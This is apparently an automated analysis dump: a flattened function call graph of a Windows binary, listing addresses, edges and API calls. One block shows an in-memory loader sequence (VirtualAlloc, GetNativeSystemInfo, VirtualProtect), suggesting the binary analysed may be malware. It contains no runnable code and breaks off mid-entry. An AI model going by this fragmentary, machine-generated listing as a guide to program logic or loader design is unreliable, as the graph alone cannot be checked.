7fef9d3d3ba RaiseException 17112->17113 17113->17054 17115 7fef9d33b40 __StateFromControlPc 36 API calls 17114->17115 17116 7fef9d2ea6f 17115->17116 17117 7fef9d2cf80 _inconsistency 36 API calls 17116->17117 17118 7fef9d2ea7a 17116->17118 17117->17118 17118->17074 17120 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17119->17120 17121 7fef9d351c1 17120->17121 17122 7fef9d351f0 __SehTransFilter 17121->17122 17146 7fef9d35970 17121->17146 17124 7fef9d2edc0 __SehTransFilter 9 API calls 17122->17124 17125 7fef9d35259 17124->17125 17125->17074 17127 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17126->17127 17128 7fef9d2eee7 17127->17128 17128->17062 17131 7fef9d34990 17129->17131 17136 7fef9d3498b 17129->17136 17130 7fef9d349b2 __SehTransFilter 17132 7fef9d34a41 17130->17132 17133 7fef9d2cf80 _inconsistency 36 API calls 17130->17133 17130->17136 17131->17130 17163 7fef9d23d00 RtlEncodePointer 17131->17163 17134 7fef9d2ea30 __SehTransFilter 36 API calls 17132->17134 17133->17132 17137 7fef9d34a8e __SehTransFilter 17134->17137 17136->17062 17137->17136 17138 7fef9d35180 __SehTransFilter 38 API calls 17137->17138 17138->17136 17142 7fef9d3d660 17139->17142 17143 7fef9d3437d 17142->17143 17144 7fef9d3d676 std::exception::_Copy_str malloc 17142->17144 17143->17111 17144->17143 17145 7fef9d2d490 std::exception::_Copy_str 17 API calls 17144->17145 17145->17143 17147 7fef9d35998 17146->17147 17150 7fef9d355f0 17147->17150 17149 7fef9d359d3 __SehTransFilter __AdjustPointer 17149->17122 17151 7fef9d3561e __SehTransFilter 17150->17151 17152 7fef9d35765 17151->17152 17153 7fef9d356fa _ValidateRead 17151->17153 17160 7fef9d356aa __SehTransFilter __AdjustPointer 17151->17160 17154 7fef9d35813 __SehTransFilter 17152->17154 17158 7fef9d3577a _ValidateRead 17152->17158 17157 7fef9d2cf80 _inconsistency 36 API calls 17153->17157 17153->17160 17155 7fef9d3584d _ValidateRead 17154->17155 17156 7fef9d358c6 __SehTransFilter _ValidateExecute _ValidateRead 17154->17156 17155->17160 17162 7fef9d2cf80 _inconsistency 36 API calls 17155->17162 17156->17160 17161 7fef9d2cf80 _inconsistency 36 API calls 17156->17161 17157->17160 17159 7fef9d2cf80 _inconsistency 36 API calls 17158->17159 17158->17160 17159->17160 17160->17149 17161->17160 17162->17160 17163->17130 18191 7fef9d23130 18192 7fef9d23170 __GSHandlerCheck 8 API calls 18191->18192 18193 7fef9d23160 18192->18193 17164 7fef9d3c435 17165 7fef9d3c479 _CrtMemDumpAllObjectsSince 17164->17165 17166 7fef9d3c598 DecodePointer 17165->17166 17167 7fef9d3c60d _CrtMemDumpAllObjectsSince 17166->17167 17168 7fef9d3c62b DecodePointer 17167->17168 17169 7fef9d3c652 _CrtMemDumpAllObjectsSince 17167->17169 17168->17169 17170 7fef9d3c676 DecodePointer 17169->17170 17180 7fef9d3c69d std::exception::_Copy_str 17169->17180 17170->17180 17171 7fef9d3b99c 17172 7fef9d3cc93 17171->17172 17177 7fef9d3bada 17171->17177 17174 7fef9d2bd70 _invalid_parameter 17 API calls 17172->17174 17175 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17172->17175 17174->17175 17176 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17175->17176 17178 7fef9d3cd90 17176->17178 17179 7fef9d2bd70 _invalid_parameter 17 API calls 17177->17179 17179->17175 17180->17171 17181 7fef9d3b530 17180->17181 17184 7fef9d3b090 17181->17184 17183 7fef9d3b56c 17183->17180 17185 7fef9d3b0b7 17184->17185 17186 7fef9d3b1a6 _CrtMemDumpAllObjectsSince 17185->17186 17187 7fef9d3b168 17185->17187 17193 7fef9d3b0c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 17185->17193 17189 7fef9d3b347 _CrtMemDumpAllObjectsSince 17186->17189 17194 7fef9d3b1cf 17186->17194 17188 7fef9d2bd70 _invalid_parameter 17 API calls 17187->17188 17188->17193 17190 7fef9d3b359 WideCharToMultiByte 17189->17190 17191 7fef9d3b3ab 17190->17191 17192 7fef9d3b3c1 GetLastError 17191->17192 17191->17193 17192->17193 17196 7fef9d3b3d0 _calloc_dbg_impl 17192->17196 17193->17183 17194->17193 17195 7fef9d2bd70 _invalid_parameter 17 API calls 17194->17195 17195->17193 17196->17193 17197 7fef9d2bd70 _invalid_parameter 17 API calls 17196->17197 17197->17193 16439 7fef9d23433 16440 7fef9d23437 16439->16440 16446 7fef9d23446 16439->16446 16441 7fef9d27d00 _ioterm DeleteCriticalSection 16440->16441 16442 7fef9d2343c 16441->16442 16443 7fef9d23e00 3 API calls 16442->16443 16444 7fef9d23441 16443->16444 16447 7fef9d288d0 HeapDestroy 16444->16447 16447->16446 17198 7fef9d3d830 17199 7fef9d3d8aa 17198->17199 17200 7fef9d3d926 17199->17200 17201 7fef9d3d97b 17199->17201 17202 7fef9d2bd70 _invalid_parameter 17 API calls 17200->17202 17203 7fef9d3d9ee 17201->17203 17205 7fef9d3da43 17201->17205 17207 7fef9d3d95a _LocaleUpdate::~_LocaleUpdate 17202->17207 17204 7fef9d2bd70 _invalid_parameter 17 API calls 17203->17204 17204->17207 17209 7fef9d3eca1 17205->17209 17211 7fef9d3dbb5 17205->17211 17206 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17208 7fef9d3ed9e 17206->17208 17207->17206 17209->17207 17210 7fef9d2bd70 _invalid_parameter 17 API calls 17209->17210 17210->17207 17212 7fef9d2bd70 _invalid_parameter 17 API calls 17211->17212 17212->17207 17213 7fef9d26c32 17214 7fef9d26c3c 17213->17214 17215 7fef9d26c7a _CrtMemDumpAllObjectsSince 17214->17215 17216 7fef9d26e25 _LocaleUpdate::~_LocaleUpdate 17214->17216 17219 7fef9d2c260 _CrtMemDumpAllObjectsSince_stat 3 API calls 17215->17219 17220 7fef9d26ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 17215->17220 17217 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17216->17217 17218 7fef9d26e89 17217->17218 17219->17220 17221 7fef9d2c0c0 _swprintf_p 17 API calls 17220->17221 17223 7fef9d26dc7 17221->17223 17222 7fef9d26e12 17223->17222 17224 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17223->17224 17224->17222 17225 7fef9d33e3b 17226 7fef9d33ec7 17225->17226 17227 7fef9d2e790 __SehTransFilter 37 API calls 17226->17227 17228 7fef9d33ee4 17227->17228 16507 2c0000 16508 2c0183 16507->16508 16509 2c043e VirtualAlloc 16508->16509 16513 2c0462 16509->16513 16510 2c0a00 16511 2c0531 GetNativeSystemInfo 16511->16510 16512 2c056d VirtualAlloc 16511->16512 16514 2c058b 16512->16514 16513->16510 16513->16511 16514->16510 16515 2c09d9 VirtualProtect 16514->16515 16515->16514 17229 7fef9d2443c 17230 7fef9d2444c 17229->17230 17233 7fef9d29360 LeaveCriticalSection 17230->17233 17232 7fef9d248be 17233->17232 18218 7fef9d39939 18219 7fef9d39951 __doserrno 18218->18219 18220 7fef9d2bd70 _invalid_parameter 17 API calls 18219->18220 18221 7fef9d399d7 18220->18221 18222 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18221->18222 18223 7fef9d3a9f5 18222->18223 17234 7fef9d3e424 17235 7fef9d3e469 _CrtMemDumpAllObjectsSince 17234->17235 17236 7fef9d3e588 DecodePointer 17235->17236 17237 7fef9d3e5fd _CrtMemDumpAllObjectsSince 17236->17237 17238 7fef9d3e642 _CrtMemDumpAllObjectsSince 17237->17238 17239 7fef9d3e61b DecodePointer 17237->17239 17240 7fef9d3e666 DecodePointer 17238->17240 17241 7fef9d3e68d std::exception::_Copy_str 17238->17241 17239->17238 17240->17241 17242 7fef9d3eadf 17241->17242 17251 7fef9d3da75 17241->17251 17263 7fef9d3eec0 17241->17263 17267 7fef9d3ef10 17242->17267 17245 7fef9d3eafd 17246 7fef9d3eb33 17245->17246 17248 7fef9d3eec0 25 API calls 17245->17248 17247 7fef9d3ec29 17246->17247 17261 7fef9d3eb49 _CrtMemDumpAllObjectsSince 17246->17261 17249 7fef9d3ebda 17247->17249 17250 7fef9d3ef10 25 API calls 17247->17250 17248->17246 17249->17251 17254 7fef9d3eec0 25 API calls 17249->17254 17250->17249 17252 7fef9d3eca1 17251->17252 17257 7fef9d3dbb5 17251->17257 17253 7fef9d2bd70 _invalid_parameter 17 API calls 17252->17253 17255 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17252->17255 17253->17255 17254->17251 17256 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17255->17256 17258 7fef9d3ed9e 17256->17258 17260 7fef9d2bd70 _invalid_parameter 17 API calls 17257->17260 17260->17255 17261->17249 17271 7fef9d3f000 17261->17271 17278 7fef9d3ee40 17261->17278 17264 7fef9d3eed7 17263->17264 17265 7fef9d3ef07 17264->17265 17266 7fef9d3ee40 25 API calls 17264->17266 17265->17242 17266->17264 17269 7fef9d3ef2c 17267->17269 17268 7fef9d3ef4d 17268->17245 17269->17268 17270 7fef9d3ee40 25 API calls 17269->17270 17270->17269 17272 7fef9d3f026 _CrtMemDumpAllObjectsSince wcsxfrm 17271->17272 17275 7fef9d3f031 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 17271->17275 17273 7fef9d3f276 _CrtMemDumpAllObjectsSince 17272->17273 17272->17275 17276 7fef9d3f146 _CrtMemDumpAllObjectsSince 17272->17276 17274 7fef9d3f29d MultiByteToWideChar 17273->17274 17274->17275 17275->17261 17276->17275 17277 7fef9d3f1b5 MultiByteToWideChar 17276->17277 17277->17275 17279 7fef9d3ee62 17278->17279 17281 7fef9d3ee6e 17279->17281 17282 7fef9d3f360 17279->17282 17281->17261 17283 7fef9d3f719 17282->17283 17284 7fef9d3f399 17282->17284 17287 7fef9d40170 23 API calls 17283->17287 17317 7fef9d3f4f2 17283->17317 17318 7fef9d3afb0 17284->17318 17287->17317 17288 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17290 7fef9d3f7c5 17288->17290 17289 7fef9d3f3ed 17293 7fef9d3f4c7 17289->17293 17294 7fef9d3afb0 _fflush_nolock 17 API calls 17289->17294 17290->17281 17291 7fef9d3afb0 _fflush_nolock 17 API calls 17292 7fef9d3f3b8 17291->17292 17292->17289 17295 7fef9d3afb0 _fflush_nolock 17 API calls 17292->17295 17293->17317 17322 7fef9d40170 17293->17322 17297 7fef9d3f43d 17294->17297 17299 7fef9d3f3ca 17295->17299 17298 7fef9d3f484 17297->17298 17300 7fef9d3afb0 _fflush_nolock 17 API calls 17297->17300 17298->17293 17303 7fef9d3f561 17298->17303 17301 7fef9d3afb0 _fflush_nolock 17 API calls 17299->17301 17302 7fef9d3f44f 17300->17302 17301->17289 17302->17298 17306 7fef9d3afb0 _fflush_nolock 17 API calls 17302->17306 17304 7fef9d3afb0 _fflush_nolock 17 API calls 17303->17304 17305 7fef9d3f56e 17304->17305 17307 7fef9d3f5b8 17305->17307 17309 7fef9d3afb0 _fflush_nolock 17 API calls 17305->17309 17308 7fef9d3f461 17306->17308 17307->17283 17312 7fef9d3f604 17307->17312 17310 7fef9d3afb0 _fflush_nolock 17 API calls 17308->17310 17311 7fef9d3f580 17309->17311 17310->17298 17311->17307 17314 7fef9d3afb0 _fflush_nolock 17 API calls 17311->17314 17313 7fef9d3b530 wctomb_s 19 API calls 17312->17313 17313->17317 17315 7fef9d3f592 17314->17315 17316 7fef9d3afb0 _fflush_nolock 17 API calls 17315->17316 17316->17307 17317->17288 17320 7fef9d3afc1 17318->17320 17319 7fef9d3b04b 17319->17289 17319->17291 17320->17319 17321 7fef9d2bd70 _invalid_parameter 17 API calls 17320->17321 17321->17319 17323 7fef9d40185 17322->17323 17324 7fef9d3afb0 _fflush_nolock 17 API calls 17323->17324 17326 7fef9d401c7 17324->17326 17325 7fef9d401dc 17325->17317 17326->17325 17327 7fef9d3ab10 17 API calls 17326->17327 17328 7fef9d40326 17326->17328 17327->17328 17328->17325 17329 7fef9d39290 23 API calls 17328->17329 17329->17325 17330 7fef9d25a25 17331 7fef9d25a37 17330->17331 17332 7fef9d2bd70 _invalid_parameter 17 API calls 17331->17332 17333 7fef9d25aaf 17332->17333 18224 7fef9d34920 18227 7fef9d3d530 18224->18227 18230 7fef9d3d580 18227->18230 18231 7fef9d3d59a std::exception::_Tidy 18230->18231 18232 7fef9d3493d 18230->18232 18231->18232 18233 7fef9d3d660 std::exception::_Copy_str 17 API calls 18231->18233 18233->18232 18238 7fef9d29328 18239 7fef9d29336 EnterCriticalSection 18238->18239 18240 7fef9d2932c 18238->18240 18240->18239 18241 7fef9d3ff2d 18242 7fef9d3ff37 18241->18242 18243 7fef9d40042 18242->18243 18244 7fef9d3ff47 18242->18244 18256 7fef9d29360 LeaveCriticalSection 18243->18256 18245 7fef9d4003d 18244->18245 18248 7fef9d3ae90 _lock_file2 EnterCriticalSection 18244->18248 18247 7fef9d4004c 18249 7fef9d3ff97 18248->18249 18250 7fef9d3ffd0 18249->18250 18252 7fef9d3ffe1 18249->18252 18253 7fef9d3ffbb 18249->18253 18251 7fef9d3af60 _unlock_file2 2 API calls 18250->18251 18251->18245 18252->18250 18255 7fef9d3fd70 _fflush_nolock 25 API calls 18252->18255 18254 7fef9d3fd70 _fflush_nolock 25 API calls 18253->18254 18254->18250 18255->18250 18256->18247 18261 7fef9d2b12b 18262 7fef9d2b14c 18261->18262 18263 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18262->18263 18265 7fef9d2b2e0 18262->18265 18263->18265 18264 7fef9d2b33e 18277 7fef9d30cc0 18264->18277 18265->18264 18266 7fef9d2d490 std::exception::_Copy_str 17 API calls 18265->18266 18268 7fef9d2b311 18266->18268 18271 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18268->18271 18270 7fef9d2b37d 18275 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18270->18275 18271->18264 18272 7fef9d2cff0 terminate 34 API calls 18273 7fef9d2b373 18272->18273 18274 7fef9d27090 _exit 33 API calls 18273->18274 18274->18270 18276 7fef9d2b3a0 18275->18276 18295 7fef9d23d00 RtlEncodePointer 18277->18295 18279 7fef9d30cf6 18280 7fef9d30d23 LoadLibraryW 18279->18280 18281 7fef9d30e15 18279->18281 18282 7fef9d30d44 GetProcAddress 18280->18282 18290 7fef9d30d3d 18280->18290 18284 7fef9d30e39 DecodePointer DecodePointer 18281->18284 18292 7fef9d30e68 18281->18292 18283 7fef9d30d6a 7 API calls 18282->18283 18282->18290 18283->18281 18287 7fef9d30df3 GetProcAddress EncodePointer 18283->18287 18284->18292 18285 7fef9d30f60 DecodePointer 18285->18290 18286 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18291 7fef9d2b358 18286->18291 18287->18281 18288 7fef9d30eed DecodePointer 18289 7fef9d30f0d 18288->18289 18289->18285 18293 7fef9d30f2f DecodePointer 18289->18293 18290->18286 18291->18270 18291->18272 18292->18288 18292->18289 18294 7fef9d30ec8 18292->18294 18293->18285 18293->18294 18294->18285 18295->18279 18296 7fef9d234d5 18297 7fef9d234da _calloc_dbg 18296->18297 18298 7fef9d2350b FlsSetValue 18297->18298 18302 7fef9d23548 18297->18302 18299 7fef9d23520 18298->18299 18298->18302 18300 7fef9d23e30 LeaveCriticalSection 18299->18300 18301 7fef9d2352c GetCurrentThreadId 18300->18301 18301->18302 18303 7fef9d25ad9 18304 7fef9d25add 18303->18304 18305 7fef9d26380 _CrtIsValidHeapPointer HeapValidate 18304->18305 18306 7fef9d25b3a 18305->18306 18309 7fef9d29360 LeaveCriticalSection 18306->18309 18308 7fef9d25c14 18309->18308 17343 7fef9d233d6 17346 7fef9d288d0 HeapDestroy 17343->17346 17345 7fef9d233db 17346->17345 18321 7fef9d266da 18322 7fef9d26725 18321->18322 18325 7fef9d26745 18321->18325 18322->18325 18327 7fef9d29a70 18322->18327 18324 7fef9d2677f 18325->18324 18326 7fef9d29b10 __updatetmbcinfo LeaveCriticalSection 18325->18326 18326->18324 18329 7fef9d29a79 _updatetlocinfoEx_nolock 18327->18329 18328 7fef9d29ad8 18328->18325 18329->18328 18331 7fef9d29360 LeaveCriticalSection 18329->18331 18331->18328 18332 7fef9d268c4 18334 7fef9d268d1 18332->18334 18333 7fef9d26ba6 18350 7fef9d29360 LeaveCriticalSection 18333->18350 18334->18333 18337 7fef9d268ed _CrtIsValidPointer 18334->18337 18336 7fef9d26bb0 18338 7fef9d2695e IsBadReadPtr 18337->18338 18339 7fef9d26976 18337->18339 18348 7fef9d2692f 18337->18348 18338->18339 18340 7fef9d26ad2 18339->18340 18341 7fef9d26a29 18339->18341 18342 7fef9d26add 18340->18342 18345 7fef9d26b2d 18340->18345 18343 7fef9d26abe 18341->18343 18344 7fef9d26a86 IsBadReadPtr 18341->18344 18347 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18342->18347 18346 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18343->18346 18344->18343 18344->18348 18345->18348 18349 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18345->18349 18346->18348 18347->18348 18349->18348 18350->18336 18351 7fef9d376c0 18352 7fef9d376cf _CrtMemDumpAllObjectsSince 18351->18352 18353 7fef9d37be3 _CrtMemDumpAllObjectsSince 18351->18353 18355 7fef9d37905 _CrtMemDumpAllObjectsSince 18352->18355 18356 7fef9d377f5 _CrtMemDumpAllObjectsSince wcsncnt 18352->18356 18364 7fef9d376e6 _LocaleUpdate::~_LocaleUpdate 18352->18364 18354 7fef9d37cc6 WideCharToMultiByte 18353->18354 18353->18364 18354->18364 18357 7fef9d3790f WideCharToMultiByte 18355->18357 18360 7fef9d37827 WideCharToMultiByte 18356->18360 18359 7fef9d37965 18357->18359 18358 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18361 7fef9d37d85 18358->18361 18362 7fef9d3799a GetLastError 18359->18362 18359->18364 18360->18364 18362->18364 18365 7fef9d379d3 _CrtMemDumpAllObjectsSince 18362->18365 18363 7fef9d37a05 WideCharToMultiByte 18363->18364 18363->18365 18364->18358 18365->18363 18365->18364 17359 7fef9d2f7f1 17360 7fef9d2f80d 17359->17360 17381 7fef9d2f8de _wcsftime_l 17359->17381 17416 7fef9d36fb0 17360->17416 17362 7fef9d2fa70 17423 7fef9d369c0 17362->17423 17364 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17367 7fef9d2f85a OutputDebugStringA 17364->17367 17366 7fef9d2f9f4 17366->17362 17370 7fef9d2d490 std::exception::_Copy_str 17 API calls 17366->17370 17371 7fef9d2f872 OutputDebugStringA OutputDebugStringA OutputDebugStringA OutputDebugStringA 17367->17371 17368 7fef9d2fa8a 17369 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17368->17369 17372 7fef9d2fab7 17369->17372 17373 7fef9d2fa43 17370->17373 17375 7fef9d2f8ce 17371->17375 17377 7fef9d2fb24 17372->17377 17379 7fef9d369c0 17 API calls 17372->17379 17392 7fef9d2fb6a 17372->17392 17376 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17373->17376 17386 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17375->17386 17376->17362 17380 7fef9d369c0 17 API calls 17377->17380 17378 7fef9d2f996 17378->17366 17388 7fef9d2d490 std::exception::_Copy_str 17 API calls 17378->17388 17382 7fef9d2faf7 17379->17382 17383 7fef9d2fb3d 17380->17383 17381->17366 17381->17378 17387 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17381->17387 17384 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17382->17384 17385 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17383->17385 17384->17377 17385->17392 17389 7fef9d3011d 17386->17389 17387->17378 17390 7fef9d2f9c7 17388->17390 17391 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17390->17391 17391->17366 17393 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17392->17393 17394 7fef9d2fc39 17392->17394 17393->17394 17395 7fef9d2fc97 17394->17395 17396 7fef9d2d490 std::exception::_Copy_str 17 API calls 17394->17396 17436 7fef9d36970 17395->17436 17398 7fef9d2fc6a 17396->17398 17400 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17398->17400 17400->17395 17401 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17402 7fef9d2fd6e 17401->17402 17403 7fef9d31640 17 API calls 17402->17403 17413 7fef9d2fdbb 17402->17413 17404 7fef9d2fd8e 17403->17404 17405 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17404->17405 17405->17413 17406 7fef9d2ffef 17407 7fef9d30008 OutputDebugStringA 17406->17407 17408 7fef9d30016 17406->17408 17407->17408 17408->17375 17412 7fef9d36fb0 _itow_s 17 API calls 17408->17412 17410 7fef9d2ff03 std::exception::_Copy_str 17410->17375 17410->17406 17411 7fef9d2ffaa WriteFile 17410->17411 17411->17406 17414 7fef9d30065 17412->17414 17413->17410 17439 7fef9d29360 LeaveCriticalSection 17413->17439 17415 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17414->17415 17415->17375 17417 7fef9d37003 17416->17417 17418 7fef9d36fd6 17416->17418 17420 7fef9d37030 _itow_s 17 API calls 17417->17420 17418->17417 17419 7fef9d36fdd 17418->17419 17440 7fef9d37030 17419->17440 17422 7fef9d2f82d 17420->17422 17422->17364 17424 7fef9d369e1 17423->17424 17425 7fef9d36a42 17424->17425 17427 7fef9d36a80 _calloc_dbg_impl 17424->17427 17426 7fef9d2bd70 _invalid_parameter 17 API calls 17425->17426 17434 7fef9d36a76 _calloc_dbg_impl 17426->17434 17428 7fef9d36b6e 17427->17428 17432 7fef9d36bac _calloc_dbg_impl 17427->17432 17430 7fef9d2bd70 _invalid_parameter 17 API calls 17428->17430 17429 7fef9d36ce8 17433 7fef9d2bd70 _invalid_parameter 17 API calls 17429->17433 17430->17434 17431 7fef9d36d26 _calloc_dbg_impl 17431->17434 17435 7fef9d2bd70 _invalid_parameter 17 API calls 17431->17435 17432->17429 17432->17431 17433->17434 17434->17368 17435->17434 17456 7fef9d363e0 17436->17456 17438 7fef9d2fd20 17438->17401 17439->17410 17441 7fef9d37055 17440->17441 17442 7fef9d370ab 17441->17442 17444 7fef9d370e9 17441->17444 17443 7fef9d2bd70 _invalid_parameter 17 API calls 17442->17443 17453 7fef9d370df 17443->17453 17445 7fef9d3714a 17444->17445 17446 7fef9d37188 _calloc_dbg_impl 17444->17446 17447 7fef9d2bd70 _invalid_parameter 17 API calls 17445->17447 17448 7fef9d37287 17446->17448 17451 7fef9d372c5 17446->17451 17447->17453 17449 7fef9d2bd70 _invalid_parameter 17 API calls 17448->17449 17449->17453 17450 7fef9d37338 17452 7fef9d2bd70 _invalid_parameter 17 API calls 17450->17452 17451->17450 17454 7fef9d37376 17451->17454 17452->17453 17453->17422 17454->17453 17455 7fef9d2bd70 _invalid_parameter 17 API calls 17454->17455 17455->17453 17457 7fef9d3640e 17456->17457 17458 7fef9d3648e 17457->17458 17460 7fef9d364cc _calloc_dbg_impl 17457->17460 17459 7fef9d2bd70 _invalid_parameter 17 API calls 17458->17459 17466 7fef9d364c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 17459->17466 17461 7fef9d3668e _CrtMemDumpAllObjectsSince 17460->17461 17462 7fef9d3663f 17460->17462 17468 7fef9d35ea0 17461->17468 17464 7fef9d2bd70 _invalid_parameter 17 API calls 17462->17464 17464->17466 17465 7fef9d366b5 _calloc_dbg_impl 17465->17466 17467 7fef9d2bd70 _invalid_parameter 17 API calls 17465->17467 17466->17438 17467->17466 17469 7fef9d35ecf 17468->17469 17470 7fef9d35fae 17469->17470 17471 7fef9d35f6e 17469->17471 17478 7fef9d35eda std::exception::_Copy_str _LocaleUpdate::~_LocaleUpdate 17469->17478 17472 7fef9d35fcf _CrtMemDumpAllObjectsSince 17470->17472 17473 7fef9d362e1 _CrtMemDumpAllObjectsSince 17470->17473 17474 7fef9d2bd70 _invalid_parameter 17 API calls 17471->17474 17476 7fef9d360a1 MultiByteToWideChar 17472->17476 17472->17478 17475 7fef9d3632f MultiByteToWideChar 17473->17475 17473->17478 17474->17478 17475->17478 17477 7fef9d3610e GetLastError 17476->17477 17476->17478 17477->17478 17479 7fef9d36154 _CrtMemDumpAllObjectsSince wcsxfrm 17477->17479 17478->17465 17479->17478 17480 7fef9d36238 MultiByteToWideChar 17479->17480 17480->17478 16448 7fef9d26ff2 16449 7fef9d26ffe 16448->16449 16452 7fef9d2ca00 16449->16452 16451 7fef9d27011 _initterm_e 16455 7fef9d2ca0e 16452->16455 16453 7fef9d2ca23 EncodePointer 16453->16455 16454 7fef9d2ca4b 16454->16451 16455->16453 16455->16454 18421 7fef9d3e2fc 18422 7fef9d3e309 get_int64_arg _get_printf_count_output 18421->18422 18423 7fef9d3e38c 18422->18423 18424 7fef9d3e3e1 18422->18424 18428 7fef9d2bd70 _invalid_parameter 17 API calls 18423->18428 18425 7fef9d3eadf 18424->18425 18426 7fef9d3eec0 25 API calls 18424->18426 18435 7fef9d3da75 18424->18435 18427 7fef9d3ef10 25 API calls 18425->18427 18426->18425 18429 7fef9d3eafd 18427->18429 18441 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18428->18441 18430 7fef9d3eb33 18429->18430 18432 7fef9d3eec0 25 API calls 18429->18432 18431 7fef9d3ec29 18430->18431 18445 7fef9d3eb49 _CrtMemDumpAllObjectsSince 18430->18445 18433 7fef9d3ebda 18431->18433 18434 7fef9d3ef10 25 API calls 18431->18434 18432->18430 18433->18435 18440 7fef9d3eec0 25 API calls 18433->18440 18434->18433 18437 7fef9d3eca1 18435->18437 18442 7fef9d3dbb5 18435->18442 18436 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18438 7fef9d3ed9e 18436->18438 18439 7fef9d2bd70 _invalid_parameter 17 API calls 18437->18439 18437->18441 18439->18441 18440->18435 18441->18436 18444 7fef9d2bd70 _invalid_parameter 17 API calls 18442->18444 18443 7fef9d3f000 wcsxfrm 2 API calls 18443->18445 18444->18441 18445->18433 18445->18443 18446 7fef9d3ee40 25 API calls 18445->18446 18446->18445 17485 7fef9d253fb 17486 7fef9d2541d _realloc_dbg 17485->17486 17488 7fef9d25421 17486->17488 17491 7fef9d26380 17486->17491 17489 7fef9d254de _calloc_dbg_impl _realloc_dbg 17495 7fef9d2c020 17489->17495 17492 7fef9d26391 17491->17492 17493 7fef9d26395 _CrtIsValidPointer 17491->17493 17492->17489 17493->17492 17494 7fef9d263b6 HeapValidate 17493->17494 17494->17492 17496 7fef9d2c039 _get_errno_from_oserr 17495->17496 17497 7fef9d2c03b HeapFree 17495->17497 17496->17488 17497->17496 17498 7fef9d2c05a GetLastError 17497->17498 17498->17496 16521 7fef9d235e1 16522 7fef9d235f1 16521->16522 16526 7fef9d235ea 16521->16526 16522->16526 16527 7fef9d212b0 16522->16527 16525 7fef9d212b0 14 API calls 16525->16526 16528 7fef9d212de CoLoadLibrary 16527->16528 16534 7fef9d22f8c 16527->16534 16530 7fef9d22f0f MessageBoxA ExitProcess 16528->16530 16531 7fef9d22f2e VirtualAlloc RtlAllocateHeap 16528->16531 16529 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16532 7fef9d230ff 16529->16532 16533 7fef9d22f73 _calloc_dbg_impl 16531->16533 16531->16534 16532->16525 16532->16526 16535 7fef9d22f83 CoTaskMemFree 16533->16535 16534->16529 16535->16534 17499 7fef9d23fe1 17500 7fef9d23fea SetLastError 17499->17500 16536 7fef9d27de0 16537 7fef9d27ded 16536->16537 16539 7fef9d27df2 std::exception::_Copy_str _calloc_dbg 16536->16539 16543 7fef9d2aa40 16537->16543 16540 7fef9d27e0e 16539->16540 16547 7fef9d2d490 16539->16547 16557 7fef9d27ff0 16539->16557 16544 7fef9d2aa4d 16543->16544 16546 7fef9d2aa57 16543->16546 16561 7fef9d29c10 16544->16561 16546->16539 16549 7fef9d2d4b1 16547->16549 16548 7fef9d2d512 16550 7fef9d2bd70 _invalid_parameter 17 API calls 16548->16550 16549->16548 16551 7fef9d2d550 _calloc_dbg_impl 16549->16551 16553 7fef9d2d546 _calloc_dbg_impl 16550->16553 16552 7fef9d2d63e 16551->16552 16555 7fef9d2d67c _calloc_dbg_impl 16551->16555 16554 7fef9d2bd70 _invalid_parameter 17 API calls 16552->16554 16553->16539 16554->16553 16555->16553 16556 7fef9d2bd70 _invalid_parameter 17 API calls 16555->16556 16556->16553 16558 7fef9d28010 16557->16558 16559 7fef9d2800e 16557->16559 16560 7fef9d2be00 _invoke_watson_if_oneof 16 API calls 16558->16560 16559->16539 16560->16559 16562 7fef9d29c2a 16561->16562 16571 7fef9d29b10 16562->16571 16564 7fef9d29c34 16575 7fef9d29f20 16564->16575 16566 7fef9d29c51 16568 7fef9d29ecd 16566->16568 16581 7fef9d2a000 16566->16581 16568->16546 16569 7fef9d29ce8 16569->16568 16594 7fef9d29360 LeaveCriticalSection 16569->16594 16572 7fef9d29b19 16571->16572 16574 7fef9d29bde 16572->16574 16595 7fef9d29360 LeaveCriticalSection 16572->16595 16574->16564 16576 7fef9d29f49 16575->16576 16577 7fef9d29f81 16576->16577 16578 7fef9d29f5b GetOEMCP 16576->16578 16579 7fef9d29f88 GetACP 16577->16579 16580 7fef9d29f79 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16577->16580 16578->16580 16579->16580 16580->16566 16582 7fef9d29f20 __initmbctable 2 API calls 16581->16582 16583 